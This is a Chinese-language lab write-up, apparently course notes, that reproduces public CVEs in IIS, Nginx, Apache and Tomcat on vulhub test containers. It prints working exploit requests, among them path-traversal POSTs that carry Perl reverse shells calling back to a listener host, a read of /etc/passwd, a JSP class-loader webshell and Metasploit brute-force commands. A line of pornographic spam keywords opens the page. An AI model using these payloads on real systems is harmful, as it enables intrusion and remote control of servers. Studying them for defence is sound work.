国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx

這篇具有很好參考價(jià)值的文章主要介紹了第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。


文章僅供學(xué)習(xí)交流,一些價(jià)值不高的漏洞沒復(fù)現(xiàn),日后來興趣再補(bǔ)坑(大概~)

文章略長(zhǎng),閱讀需耐心~


視頻鏈接:?

【小迪安全】紅藍(lán)對(duì)抗 | 網(wǎng)絡(luò)攻防 | V2022全棧培訓(xùn)_嗶哩嗶哩_bilibilihttps://www.bilibili.com/video/BV1pQ4y1s7kH

目錄

一.知識(shí)點(diǎn)

二.章節(jié)內(nèi)容

1、常見中間件的安全測(cè)試

2、中間件安全測(cè)試流程

三.案例演示

1、中間件-IIS-短文件&文件解析&藍(lán)屏等

2、中間件-Nginx-文件解析&命令執(zhí)行等

(1)文件后綴解析漏洞

(2)CVE-2013-4547? 文件名邏輯漏洞

(3)CVE_2021_23017 DNS解析漏洞 (無exp)

(4)CVE_2017_7529 整數(shù)溢出漏洞 (價(jià)值不大)

3、中間件-Apache-RCE&目錄遍歷&文件解析等

?(1)CVE_2021_41773 目錄穿越漏洞

(2)CVE_2021_42013? 路徑穿越漏洞

(3)CVE-2017-15715 文件解析

(4)CVE_2017_9798? 信息泄露 (價(jià)值不高)

(5)CVE_2018_11759? ?mod_jk訪問控制繞過漏洞(價(jià)值不高)

(6)CVE_2021_37580 身份驗(yàn)證繞過漏洞

4、中間件-Tomcat-弱口令&文件上傳&文件包含等

(1)弱口令猜解

(2)CVE-2017-12615? 文件上傳漏洞

(3)CVE-2020-1938? 文件包含漏洞

(4)CVE-2020-11996 拒絕服務(wù)漏洞 (意義不大)

(5)CVE-2020-9484 反序列化漏洞 (條件苛刻)

四.總結(jié)


相關(guān)資源下載:

鏈接:https://pan.baidu.com/s/1-9fEinVvFJd4_dPisHrMMQ?
提取碼:sioq

一.知識(shí)點(diǎn)

中間件及框架列表:

IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,F(xiàn)lask,jQuery 等

本節(jié)課程涉及以下中間件案例演示:

1、中間件-IIS-短文件&解析&藍(lán)屏等

2、中間件-Nginx-文件解析&命令執(zhí)行等

3、中間件-Apache-RCE&目錄遍歷&文件解析等

4、中間件-Tomcat-弱口令&文件上傳&文件包含等

二.章節(jié)內(nèi)容

1、常見中間件的安全測(cè)試

(1)配置不當(dāng)-解析&弱口令

(2)安全機(jī)制-特定安全漏洞

(3)安全機(jī)制-弱口令爆破攻擊

(4)安全應(yīng)用-框架特定安全漏洞

2、中間件安全測(cè)試流程

(1)判斷中間件信息-名稱&版本&三方

(2)判斷中間件問題-配置不當(dāng)&公開漏洞

(3)判斷中間件利用-弱口令&EXP&框架漏洞

三.案例演示

1、中間件-IIS-短文件&文件解析&藍(lán)屏等

IIS相關(guān)案例在day18和day33均有涉及,筆者這里先占個(gè)位,后面返回去學(xué)再補(bǔ)充~

????????IIS簡(jiǎn)介:英文名稱Internet Information Services(互聯(lián)網(wǎng)信息服務(wù)),是Microsoft公司提供的可擴(kuò)展Web服務(wù)器,支持HTTP,HTTP/2,HTTPS,F(xiàn)TP,F(xiàn)TPS,SMTP和NNTP等。?

(1)短文件名漏洞:信息收集

(2)文件解析:還有點(diǎn)用

(3)HTTP.SYS:藍(lán)屏崩潰

(4)CVE-2017-7269 條件過老

2、中間件-Nginx-文件解析&命令執(zhí)行等

(1)文件后綴解析漏洞

? ? ? ? 簡(jiǎn)介:該漏洞與 Nginx、php 版本無關(guān),屬于用戶配置不當(dāng)造成的解析漏洞。在默認(rèn)Fast-CGI開啟狀況下,在一個(gè)文件路徑(/xx.jpg)后面加上/xx.php會(huì)將/xx.jpg/xx.php解析為php文件。

打開vulhub靶場(chǎng),進(jìn)入/nginx/nginx_parsing_vulnerability/目錄下啟動(dòng)容器,訪問url

cd /nginx/nginx_parsing_vulnerability/
docker-compose up -d

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

上傳圖片可以看到有返回圖片路徑

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

訪問圖片路徑能正常顯示

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

這里有兩種方法,第一種上傳自制的圖片馬,第二種直接用bp抓包然后寫入一句話木馬,這里用第一種。

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

上傳,訪問圖片路徑url可正常顯示,在url后加/.php就能執(zhí)行一句話木馬。(注:這里若報(bào)錯(cuò)就換張圖片或換個(gè)地方插入木馬代碼)

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

上蟻劍,直接梭哈,成功利用

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

(2)CVE-2013-4547? 文件名邏輯漏洞

????????簡(jiǎn)介:在Nginx特定版本中存在錯(cuò)誤解析用戶請(qǐng)求的url信息,從而導(dǎo)致文件代碼執(zhí)行。

????????影響版本:Nginx 0.8.41~1.4.3 / 1.5.0~1.5.7

vulhub打開/nginx/CVE-2013-4547/目錄,docker-compose up -d啟動(dòng)容器,查看端口,可見容器的80端口映射到靶機(jī)的8080端口,訪問http://192.168.190.153:8080

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

?開啟bp抓包,修改gif文件內(nèi)容為一句話木馬,在filename="pikaqu.gif"的gif后面加個(gè)空格,可以成功上傳gif文件

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

訪問上傳的gif文件,在Repeater模塊對(duì)url進(jìn)行g(shù)et請(qǐng)求,send后出現(xiàn)一句話木馬代碼,因此得讓這個(gè)文件以php形式解析出來

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

訪問上傳文件pikaqu.gif[0x20]時(shí),將文件修改為phpinfoa.gif[0x20][0x00].php,其中[0x20]為空格,[0x00]為\0(字符串結(jié)束標(biāo)志)

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

send后即可成功執(zhí)行php代碼

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

可自行嘗試修改一句話木馬,最后用蟻劍連接

這里會(huì)有一些疑點(diǎn),為什么一開始gif后面要加空格?為什么后邊0x20要改為0x00。筆者試過一開始不加空格,最后顯示“No input file specified.”實(shí)踐過程中,Nginx讀取文件名有“\0”時(shí)會(huì)報(bào)錯(cuò)停止執(zhí)行,如果在“\0”前面加空格,Nginx會(huì)跳過報(bào)錯(cuò)繼續(xù)執(zhí)行到“\0”(結(jié)束符)為止,這樣Nginx讀取到的文件名為pakaqu.gif[0x20],但是,由于最后加上了.php,所以通過正則表達(dá)式匹配.php后綴將pikaqu.gif[0x20][0x00].php整個(gè)交給PHP模塊當(dāng)成php文件解析。

(3)CVE_2021_23017 DNS解析漏洞 (無exp)

目前網(wǎng)上只有poc(驗(yàn)證是否存在漏洞)沒有exp(利用漏洞),只能驗(yàn)證不能利用沒啥可說的。

(4)CVE_2017_7529 整數(shù)溢出漏洞 (價(jià)值不大)

低危漏洞,且利用到最后僅能得到響應(yīng)包相關(guān)信息泄露,意義不大。

3、中間件-Apache-RCE&目錄遍歷&文件解析等

?(1)CVE_2021_41773 目錄穿越漏洞

????????簡(jiǎn)介:Apache HTTP Server 是 Apache 基礎(chǔ)開放的流行的 HTTP 服務(wù)器。在其 2.4.49 版本中,引入了一個(gè)路徑體驗(yàn),滿足下面兩個(gè)條件的 Apache 服務(wù)器將受到影響:

  • 版本等于2.4.49
  • <Directory />Require all granted</Directory>(默認(rèn)情況下允許被訪問)

攻擊者利用這個(gè)漏洞,可以讀取到Apache服務(wù)器Web目錄以外的其他文件,或者讀取Web中的腳本源碼,或者在開啟cgi或cgid的服務(wù)器上執(zhí)行任意命令。

????????影響版本:Apache HTTP Server 2.4.49

打開vulhub靶場(chǎng),進(jìn)入/httpd/CVE-2021-41773/目錄下啟動(dòng)容器,訪問url

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

bp抓包,修改url后綴,訪問可得到敏感信息

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

在kali上監(jiān)聽9999端口,bp修改請(qǐng)求包為POST請(qǐng)求,添加反彈shell命令

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: 192.168.190.153:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-None-Match: "2d-432a5e4a73a80"
If-Modified-Since: Mon, 11 Jun 2007 18:53:14 GMT
Connection: close
echo;perl -e 'use Socket;$i="192.168.190.140";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

反彈成功

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

修復(fù)建議:升級(jí)Apache HTTP Server到版本2.4.50。

由于修復(fù)不完善,后面又爆出CVE_2021_42013路徑穿越漏洞。

(2)CVE_2021_42013? 路徑穿越漏洞

????????簡(jiǎn)介:Apache HTTP Server 2.4.50 中針對(duì) CVE-2021-41773 的修復(fù)不夠充分。攻擊者可以使用路徑遍歷攻擊將 URL 映射到由類似別名的指令配置的目錄之外的文件。如果這些目錄之外的文件不受通常的默認(rèn)配置“要求全部拒絕”的保護(hù),則這些請(qǐng)求可能會(huì)成功。

????????影響版本:Apache HTTP Server 2.4.49 / 2.4.50兩個(gè)版本

打開vulhub靶場(chǎng),進(jìn)入/httpd/CVE-2021-42013/目錄下啟動(dòng)容器,訪問url

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

打開bp,抓包,修改GET請(qǐng)求,可以得到/etc/passwd文件內(nèi)容

/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

嘗試反彈shell,打開kali,監(jiān)聽9999端口

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

修改GET請(qǐng)求包為POST請(qǐng)求,在請(qǐng)求中加上反彈內(nèi)容,反彈shell可以在棱角社區(qū)生成

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: 192.168.190.153:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-None-Match: "2d-432a5e4a73a80"
If-Modified-Since: Mon, 11 Jun 2007 18:53:14 GMT
Connection: close
Content-Length: 229
echo;perl -e 'use Socket;$i="192.168.190.140";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

反彈成功

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

(3)CVE-2017-15715 文件解析

????????簡(jiǎn)介:Apache HTTPD 是一款 HTTP 服務(wù)器。其 2.4.0~2.4.29 版本存在一個(gè)解析漏洞,在解析 PHP 時(shí),雖然有對(duì)php、php3、php4、php5、phtml、pht文件后綴進(jìn)行檢查攔截,但像.php\x0A有特殊字符的不會(huì)被攔截,將被按照 PHP 后綴進(jìn)行解析,導(dǎo)致繞過一些服務(wù)器的安全策略。

????????影響版本:Apache HTTPD 2.4.0~2.4.29

打開vulhub靶場(chǎng),進(jìn)入/httpd/CVE-2017-15715/目錄下啟動(dòng)容器,訪問url

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

上傳一個(gè)圖片馬,然后用bp抓包

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

在自定義的文件名后加個(gè)空格,將其改為換行符"\n"(0x0A),點(diǎn)擊Apply changes,放包,訪問http://192.168.190.153:8080/evil.php%0A,即可成功執(zhí)行文件馬

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

蟻劍連接,成功進(jìn)入

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

(4)CVE_2017_9798? 信息泄露 (價(jià)值不高)

????????簡(jiǎn)介:Apache HTTP Server是Apache軟件基金會(huì)的一個(gè)開放源代碼的網(wǎng)頁服務(wù)器。Apache HTTP Server <= 2.2.34、2.4.x <= 2.4.27版本,若在用戶.htaccess文件中設(shè)置Limit指令,或httpd.conf中有某些錯(cuò)誤配置(即Optionsbleed),遠(yuǎn)程攻擊者可讀取進(jìn)程內(nèi)存敏感數(shù)據(jù)。

????????影響版本:

????????Apache Group HTTP Server <= 2.2.34

????????Apache Group HTTP Server 2.4.x <= 2.4.27

這個(gè)漏洞泄露的內(nèi)存數(shù)據(jù)并不大,而且利用價(jià)值不高,感興趣可以自行在vulhub玩耍。

(5)CVE_2018_11759? ?mod_jk訪問控制繞過漏洞(價(jià)值不高)

????????簡(jiǎn)介:Apache Tomcat JK(mod_jk)Connector是美國(guó)阿帕奇(Apache)軟件基金會(huì)的一款為Apache或IIS提供連接后臺(tái)Tomcat的模塊,用以為Apache或IIS服務(wù)器提供處JSP/Servlet的能力。

????????影響版本:

????????Apache Mod_jk Connector 1.2.0 ~ 1.2.44

該漏洞泄露的信息非常有限,只泄露一個(gè)界面的信息,價(jià)值有限。

(6)CVE_2021_37580 身份驗(yàn)證繞過漏洞

????????簡(jiǎn)介:Apache ShenYu(incubatng) 是一款高性能、跨語言、多協(xié)議、可擴(kuò)展、響應(yīng)式的API網(wǎng)關(guān)。支持各種語言的http 協(xié)議,支持 Dubbo、 Spring Cloud等協(xié)議。在Apache ShenYu 2.3.0 和 2.4.0版本中該框架由于 JWT 認(rèn)證的不正確使用,攻擊者可以通過該漏洞繞過JWT(JSON Web Token)安全認(rèn)證機(jī)制,直接進(jìn)入系統(tǒng)后臺(tái)。

????????影響版本:Apache ShenYu 2.3.0 /?2.4.0

以下命令解釋:拉取漏洞鏡像,拉取后查看鏡像信息,可以看到端口沒映射,所以先停止鏡像,CONTAINER ID為鏡像ID,每個(gè)人不一樣。再映射端口同時(shí)啟動(dòng),就可以訪問到http://your_ip:9095頁面,管理員賬號(hào)admin/123456

docker pull apache/shenyu-admin:2.4.0
docker ps
docker stop CONTAINER ID
docker run --rm -d -p 9095:9095 apache/shenyu-admin:2.4.0
docker ps -a

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

管理員登錄,先在里面創(chuàng)建幾個(gè)賬號(hào)

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

退出,用新建的賬號(hào)登錄,因?yàn)闆]有設(shè)置權(quán)限所以是進(jìn)不去的

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

使用bp抓這個(gè)頁面的數(shù)據(jù)包,發(fā)送給Repeater模塊

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

send后可以看到有jwt token生成

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

修改GET請(qǐng)求后綴為/dashboardUser,再次Send可以獲取到所有用戶信息(包括管理員)

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

4、中間件-Tomcat-弱口令&文件上傳&文件包含等

(1)弱口令猜解

????????簡(jiǎn)介:tomcat有一個(gè)管理后臺(tái),其用戶名和密碼在Tomcat安裝目錄下的conf\tomcat-users.xml文件中配置,一些管理員為了省事疏忽并沒有修改成強(qiáng)口令。并且Tomcat支持在后臺(tái)界面上傳war文件,所以只要能爆破到弱口令,就能嘗試上傳木馬。

????????影響版本:弱口令并沒有版本限制,以下為注意事項(xiàng)

????????Tomcat <= 6.0.0 默認(rèn)用戶名為admin,密碼為空,無暴力破解限制。
????????Tomcat >= 6.0.0 無默認(rèn)用戶,五次失敗后,賬戶即被鎖定。

打開vulhub靶場(chǎng),進(jìn)入/tomcat/tomcat8/目錄下啟動(dòng)容器,訪問url

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

打開kali,利用msfconsole進(jìn)行密碼爆破

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

選用爆破模塊,設(shè)置需要爆破的ip和端口,運(yùn)行

use auxiliary/scanner/http/tomcat_mgr_login

set rhosts 192.168.190.153

set rport 8080? ? ? ? //可忽略,默認(rèn)為8080

run

可看到成功爆破

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

返回url頁面,點(diǎn)擊Manager App進(jìn)入登錄頁面,輸入爆破的賬號(hào)密碼,進(jìn)入后臺(tái)

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

制作jsp一句話木馬:將代碼寫入一個(gè)jsp文件中,然后直接壓縮,再修改壓縮文件為war格式

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

下滑到上傳war文件的界面,上傳制作的war,在上面看到/shell文件即為上傳成功

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

蟻劍連接成功,打開虛擬終端,得到的權(quán)限為root,可見這個(gè)漏洞的危害性非常大

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

(2)CVE-2017-12615? 文件上傳漏洞

????????簡(jiǎn)介:當(dāng)存在漏洞的Tomcati運(yùn)行在Windows/Linux主機(jī)上,且啟用了HTTP PUT請(qǐng)求方法(例如,將readonly初始化參數(shù)由默認(rèn)值設(shè)置為false),攻擊者可通過精心構(gòu)造的攻擊請(qǐng)求數(shù)據(jù)包向服務(wù)器上傳包含任意代碼的JSP的webshell文件,JSP文件中的惡意代碼將能被服務(wù)器執(zhí)行,導(dǎo)致服務(wù)器上的數(shù)據(jù)泄露或獲取服務(wù)器權(quán)限。

????????影響版本:

????????Apache Tomcat 7.0.0 - 7.0.81

打開vulhub靶場(chǎng),進(jìn)入/tomcat/CVE-2017-12615/目錄下啟動(dòng)容器,訪問url

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

用bp抓包,修改GET為PUT,寫入文件名和文件內(nèi)容,訪文件可成功回顯寫入的內(nèi)容

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

接下來寫jsp一句話木馬,訪問文件頁面為空白即為成功上傳(文件不存在會(huì)報(bào)404錯(cuò)誤)

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

//jsp一句話木馬
<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("cmd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

打開蟻劍,連接成功,進(jìn)入文件目錄

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

(3)CVE-2020-1938? 文件包含漏洞

????????簡(jiǎn)介:Apache Tomcat AJP協(xié)議(默認(rèn)8009端口)由于存在實(shí)現(xiàn)缺陷導(dǎo)致相關(guān)參數(shù)可控,攻擊者 利用該漏洞可通過構(gòu)造特定參數(shù),讀取服務(wù)器Wbpp目錄下的任意文件。若服務(wù)器端同時(shí)存在文件上傳功能,攻擊者可進(jìn)一步結(jié)合文件包含實(shí)現(xiàn)遠(yuǎn)程代碼的執(zhí)行。

????????影響版本:

????????Apache Tomcat 6

????????Apache Tomcat 7 < 7.0.100

????????Apache Tomcat 8 < 8.5.51

????????Apache Tomcat 9 < 9.0.31

打開vulhub靶場(chǎng),進(jìn)入/tomcat/CVE-2020-1938/目錄下啟動(dòng)容器,訪問url

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

下載poc,CNVD-2020-10487-Tomcat-Ajp-lfi,運(yùn)行python

python CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.190.153 -p 8009 -f WEB-INF/web.xml

//注:python為2.7版本,-p表示端口,-f表示要找的文件名

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

用命令“docker exec 容器ID -it \bin\bash”進(jìn)入容器,查看webapp/ROOT/WEB-INF/web.xml文件,可見和poc暴露的信息是一樣的

退出容器命令:exit

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

(4)CVE-2020-11996 拒絕服務(wù)漏洞 (意義不大)

????????簡(jiǎn)介:Tomcat http/2 拒絕服務(wù)攻擊,通過惡意構(gòu)造HTTP/2請(qǐng)求序列會(huì)在幾秒鐘內(nèi)大量占用CPU使用率,如果在并發(fā)HTTP/2連接上發(fā)出足夠數(shù)量的此類請(qǐng)求,服務(wù)器可能會(huì)變得無響應(yīng)。

????????影響版本:

????????Apache Tomcat 10.0.0-M1~10.0.0-M5 / 9.0.0.M1~9.0.35 / 8.5.0~8.5.55

該漏洞與獲取權(quán)限無關(guān),單純?yōu)槠茐男月┒矗吘箤W(xué)習(xí)漏洞不是為了搞破壞,研究意義不大。

(5)CVE-2020-9484 反序列化漏洞 (條件苛刻)

簡(jiǎn)介:Apache Tomcat 是一個(gè)開放源代碼、運(yùn)行servlet和JSP Web應(yīng)用軟件的基于Java的Web應(yīng)用軟件容器。當(dāng)Tomcat使用自帶session同步功能時(shí),使用不安全的配置(沒有使用EncryptInterceptor)會(huì)存在反序列化漏洞,攻擊者通過精心構(gòu)造的數(shù)據(jù)包, 可以對(duì)使用了自帶session同步功能的Tomcat服務(wù)器進(jìn)行攻擊。

影響版本:

